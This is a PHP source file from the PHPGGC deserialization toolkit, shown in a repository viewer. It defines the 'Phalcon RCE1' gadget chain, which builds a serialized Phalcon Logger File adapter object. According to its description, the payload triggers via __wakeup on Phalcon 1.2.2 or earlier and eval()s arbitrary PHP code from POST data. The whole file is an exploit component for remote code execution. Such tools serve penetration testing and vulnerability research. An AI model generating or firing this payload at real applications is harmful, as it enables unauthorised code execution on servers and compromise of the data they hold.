Codebase list phpggc / 1dbc00aa-e1d1-40d2-afb5-1a0d0f775f72/upstream/0.20221114 gadgetchains / Phalcon / RCE / 1 / chain.php
1dbc00aa-e1d1-40d2-afb5-1a0d0f775f72/upstream/0.20221114

Tree @1dbc00aa-e1d1-40d2-afb5-1a0d0f775f72/upstream/0.20221114 (Download .tar.gz)

chain.php @1dbc00aa-e1d1-40d2-afb5-1a0d0f775f72/upstream/0.20221114raw · history · blame 

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<?php

namespace GadgetChain\Phalcon;

class RCE1 extends \PHPGGC\GadgetChain\RCE
{
    public static $version = '<= 1.2.2';
    public static $vector = '__wakeup';
    public static $author = 'Raz0r';
    public static $information = '
        This chain does not expect parameters, will eval() any code supplied in 
        php://input (i.e. POST data). Requires allow_url_include = true.
    ';

    # No parameters expected
    public static $parameters = [];

    public function generate(array $parameters)
    {
        return new \Phalcon\Logger\Adapter\File();
    }

    public function test_setup()
    {
        throw new \PHPGGC\Exception("This GC cannot be tested.");
    }
}